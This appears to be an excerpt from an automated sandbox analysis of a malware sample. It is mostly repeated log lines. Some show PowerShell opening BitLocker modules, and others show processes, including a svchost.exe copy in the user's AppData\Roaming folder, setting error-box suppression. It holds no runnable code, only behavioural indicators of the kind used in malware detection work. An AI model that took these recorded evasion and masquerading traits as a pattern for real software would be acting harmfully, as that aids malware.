              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_0041A8DA
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
